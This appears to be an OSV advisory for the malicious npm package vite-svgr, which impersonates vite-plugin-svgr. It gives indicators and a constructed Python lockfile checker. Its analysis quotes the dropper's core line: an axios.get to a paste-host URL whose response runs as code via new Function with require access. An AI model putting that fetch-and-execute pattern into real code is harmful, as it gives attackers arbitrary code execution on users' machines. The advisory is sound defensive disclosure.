MAL-2026-5708

Import Source
https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/vite-svgr/MAL-2026-5708.json
JSON Data
https://api.osv.dev/v1/vulns/MAL-2026-5708
Published
2026-06-12T19:27:21Z
Modified
2026-06-12T20:01:57.882374057Z
Summary
Malicious code in vite-svgr (npm)
Details


Source: amazon-inspector (a22a309bc488d107fc2734705e05bb4032432bb9b54391e8ee2325d980b2cdf5)

The package name vite-svgr impersonates the popular vite-plugin-svgr, but the shipped code is a fork of tsconfig-paths (package.json description: 'Load node modules according to tsconfig paths') with an added remote-code-execution dropper at lib/mapProps.js. The dropper performs axios.get('https://www.jsonkeeper.com/b/EQUBH', { headers: { 'x-secret-key': '_' } }) and then runs the response body's Cookie field via new Function('require', s)(require), i.e. arbitrary JavaScript with full Node require access, executed as the installing user. The code is reachable from the package's main entry via the exported configJson(...), which spawns node lib/mapProps.js as a detached process, so any consumer that imports this package and calls configJson triggers a fetch-and-execute against an anonymous, mutable paste host. The combination of name impersonation, a fork of an unrelated library, and remote payload execution is the canonical supply-chain attack shape.
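A lockfile check for this advisory, added here as an example rather than code from the OSV or ossf/malicious-packages projects: it scans a package-lock.json (lockfileVersion 2/3 layout) for vite-svgr entries and flags them either by the affected versions or by the known-malicious tarball integrity listed under indicators on this page. The lockfile content and the placeholder integrity strings for other packages are constructed for the demonstration.

```python
import json

# Values taken from the MAL-2026-5708 record on this page.
ADVISORY = {
    "id": "MAL-2026-5708",
    "package": "vite-svgr",
    "versions": {"1.1.2", "1.1.3"},
    "integrity": {
        "sha512-sHDAZ7u5LzJv7qMMawgKsqLRRh3xlnE5ryc/1M0p6kqjSVCpEGjLvcF/xwt+9zUsoeD8fGa57Z0CgaH8jgxtCg==",
    },
}

# Constructed package-lock.json (lockfileVersion 3) for the demonstration; not a real project file.
# The "PLACEHOLDER" integrity values are made up and stand in for unrelated, benign packages.
SAMPLE_LOCK = json.dumps({
    "name": "demo-app", "lockfileVersion": 3,
    "packages": {
        "": {"dependencies": {"vite-svgr": "^1.1.0", "vite-plugin-svgr": "^4.0.0"}},
        "node_modules/vite-svgr": {
            "version": "1.1.3",
            "resolved": "https://registry.npmjs.org/vite-svgr/-/vite-svgr-1.1.3.tgz",
            "integrity": "sha512-sHDAZ7u5LzJv7qMMawgKsqLRRh3xlnE5ryc/1M0p6kqjSVCpEGjLvcF/xwt+9zUsoeD8fGa57Z0CgaH8jgxtCg==",
        },
        "node_modules/vite-plugin-svgr": {"version": "4.2.0", "integrity": "sha512-PLACEHOLDER"},
        # Nested copy with a version outside the affected set: same name, must not be flagged.
        "node_modules/some-lib/node_modules/vite-svgr": {"version": "1.0.9", "integrity": "sha512-PLACEHOLDER2"},
    },
})


def find_affected(lock_text: str, advisory: dict) -> list:
    """Return every lockfile entry matching the advisory by name+version or by tarball integrity."""
    lock = json.loads(lock_text)
    hits = []
    # lockfileVersion 2/3: keys are install paths; nested copies live under .../node_modules/<name>.
    for path, entry in lock.get("packages", {}).items():
        if not path:
            continue  # the empty key is the root project, not a dependency
        name = path.rsplit("node_modules/", 1)[-1]  # keeps scoped names like @scope/pkg intact
        if name != advisory["package"]:
            continue
        reasons = []
        if entry.get("version") in advisory["versions"]:
            reasons.append("affected version")
        if entry.get("integrity") in advisory["integrity"]:
            reasons.append("known-malicious tarball integrity")
        if reasons:
            hits.append({"path": path, "version": entry.get("version"), "reasons": reasons})
    return hits
```

Both signals are checked independently so a republished tarball with the same version but different content, or the same content under a new version, still produces a hit on one of them.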

Database specific
{
    "malicious-packages-origins": [
        {
            "id": "IN-MAL-2026-006215",
            "import_time": "2026-06-12T19:44:20.792697857Z",
            "sha256": "a22a309bc488d107fc2734705e05bb4032432bb9b54391e8ee2325d980b2cdf5",
            "source": "amazon-inspector",
            "modified_time": "2026-06-12T19:27:28Z",
            "versions": [
                "1.1.3"
            ]
        },
        {
            "id": "IN-MAL-2026-006214",
            "import_time": "2026-06-12T19:44:20.686148115Z",
            "sha256": "d238c0e37d7a415f10030826af53fbff9c537bfd527553c8005fd51f6499f0c4",
            "source": "amazon-inspector",
            "modified_time": "2026-06-12T19:27:21Z",
            "versions": [
                "1.1.2"
            ]
        }
    ]
}
References
Credits

Affected packages

Package: npm / vite-svgr
Affected ranges: 1.*
Affected versions: 1.1.2, 1.1.3

Database specific

source
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/vite-svgr/MAL-2026-5708.json"
cwes
[
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506"
    },
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506"
    }
]
indicators
{
    "evidence_files": [
        {
            "path": "lib/mapProps.js",
            "sha256": "cbb95b591c97bbdc1a2f6aa41c118be14ed1e53eee6d05740317ce58942da860",
            "tlsh": "8c21124f757ca0a8017013f5672be426f965643f300290d5739c87a21f3655d6142fde"
        },
        {
            "path": "package.json",
            "sha256": "4d4f104d657b848c012ccc74af88f8769891687cf6dee211688403cfe6313929",
            "tlsh": "e041b924c928cdb365c0526a787d5681e238444b4d99fc08b3e5536e4f4c2bf62b57ae"
        }
    ],
    "package_integrity": [
        {
            "filename": "vite-svgr-1.1.3.tgz",
            "hashes": {
                "sha512_sri": "sha512-sHDAZ7u5LzJv7qMMawgKsqLRRh3xlnE5ryc/1M0p6kqjSVCpEGjLvcF/xwt+9zUsoeD8fGa57Z0CgaH8jgxtCg==",
                "sha1": "c11089a280629728d200c5267bb619eb6d0ead2f"
            }
        }
    ]
}